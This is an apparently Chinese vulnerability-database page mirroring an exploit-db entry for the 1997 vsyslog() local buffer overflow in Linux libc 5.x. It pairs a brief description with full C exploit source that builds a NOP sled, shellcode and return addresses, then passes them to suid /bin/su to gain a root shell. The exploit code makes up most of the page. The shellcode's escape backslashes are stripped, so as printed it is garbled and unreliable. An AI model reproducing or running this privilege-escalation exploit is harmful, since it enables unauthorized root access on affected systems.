Linux libc 5.3.12/5.4 (RedHat Linux 4.0) – ‘vsyslog()’ Local Buffer Overflow

Linux libc 5.3.12/5.4 (RedHat Linux 4.0) – ‘vsyslog()’ Local Buffer Overflow

漏洞ID 1053359 漏洞类型
发布时间 1997-12-21 更新时间 1997-12-21
图片[1]-Linux libc 5.3.12/5.4 (RedHat Linux 4.0) – ‘vsyslog()’ Local Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Linux libc 5.3.12/5.4 (RedHat Linux 4.0) – ‘vsyslog()’ Local Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19360
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/475/info

A buffer overflow is present in linux libc 5.4.32 and below that allows a user to obtain local root access under some conditions. The overflow is in the function vsyslog() and exploitable through the suid root program su, which passes the arg that exceeds boundaries directly to the function. The consequences of this problem being exploited that particular way are allowing a user to execute arbitrary code and gain root access.

/*
vsyslog()/openlog() exploit by BiT - 8/8 1997
Greets to: doodle, skaut, melon, kweiheri etc.
*/

#include <stdlib.h>
#include <unistd.h>

unsigned long get_esp(void)
{
__asm__("movl %esp, %eax");
}

void main(int argc, char **argv)
{
unsigned char shell[] =
"xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
"xb8x1bx56x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcd"
"x80x33xc0x40xcdx80xe8xd7xffxffxff_bin_sh";
char *buf,*p;
unsigned long *adr;
int i;
if((p=buf=malloc(2028+28)) == NULL)
exit(-1);
memset(p,0x90,2028);
p+=2028-strlen(shell);
for(i=0;i<strlen(shell);i++)
*p++=shell[i];
adr=(long *)p;
for(i=0;i<7;i++)
*adr++=get_esp();
p=(char *)adr;
*p=0;
execl("/bin/su",buf,NULL);
}

相关推荐: Bash设计错误漏洞

Bash设计错误漏洞 漏洞ID 1207630 漏洞类型 未知 发布时间 1996-10-08 更新时间 1996-10-08 CVE编号 CVE-1999-0234 CNNVD-ID CNNVD-199610-005 漏洞平台 N/A CVSS评分 4.6 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享